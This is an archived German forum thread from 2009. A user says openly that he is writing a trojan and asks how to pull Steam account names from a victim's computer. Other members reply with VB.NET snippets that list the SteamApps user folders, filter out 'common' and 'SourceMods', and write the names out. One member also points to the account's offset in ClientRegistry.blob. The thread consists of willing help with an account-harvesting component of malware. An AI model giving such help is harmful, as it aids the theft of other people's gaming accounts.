PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : stelle des steam benutzernamens



inmate
17.03.2009, 20:07
heyy , weis vllt einer grade von welchem wort ich wie weit gehen muss (VB.NET indexof) um den benutzernamen auslesen zu können ?

slaystation
17.03.2009, 20:11
../steam/steamapps/<benutzername>/

nach steamapps gibts doch ordner mit den benutzernamen, die kannst du doch nehmen...

inmate
18.03.2009, 13:52
ja richtig dass habe ich auch versucht doch mein trojaner sucht mir immer irgendeinen scheiss wenn ich das suchen will xD

deswegen dachte ich es gibt ne bestimmte stelle oder so :)

slaystation
18.03.2009, 13:56
habs etz nich ausprobiert aber (in vb.net):


For Each dir As IO.DirectoryInfo In dir.GetDirectories()
Dim dirnamen As String = IO.Path.GetFileName(dir.FullName)
ListBox1.Items.Add(dirnamen)
Next

da gibts die namen halt in ner listbox aus ... kannst ja verändern falls das klappt

inmate
18.03.2009, 16:15
also danke erstmal ich habe den code n bisschen verändert und ausserdem in einer textbox ausgeben lassen , klappt alles wunderbar doch sobald ich diese funktion in meinen trojaner einbaue sucht er mir wieder so ein komisches wort was ich garnich gebrauchen kann :D

slaystation
18.03.2009, 17:12
was sucht er denn? :D

KayKay
18.03.2009, 18:17
also danke erstmal ich habe den code n bisschen verändert und ausserdem in einer textbox ausgeben lassen , klappt alles wunderbar doch sobald ich diese funktion in meinen trojaner einbaue sucht er mir wieder so ein komisches wort was ich garnich gebrauchen kann :D

Meinst du vlt den SourceMods oder common ordner? Du kannst das so machen, damit er diese ignoriert,

Dim UserPath as String = ("C:\Programme\Valve\Steam\SteamApps\")
Dim Path As DirectoryInfo, dinfo As DirectoryInfo, sUsers As String, n As Integer = 0
Path = New IO.DirectoryInfo(UserPath)
For Each dinfo In Path.GetDirectories
If Not dinfo.Name = "common" And Not dinfo.Name = "SourceMods" Then
sUsers = dinfo.Name
n += 1
sstreamwriter.WriteLine(sUsers) 'hier die usgabe
End If
Next

So sollts klappen

inmate
18.03.2009, 19:00
grossen danke an dich ;)

blackberry
18.03.2009, 19:28
Bei meiner ClientRegistry.blob ist mein Acc beim Offset 4621.
Wenn das bei dir auch so ist, ist das Problem ja gelöst!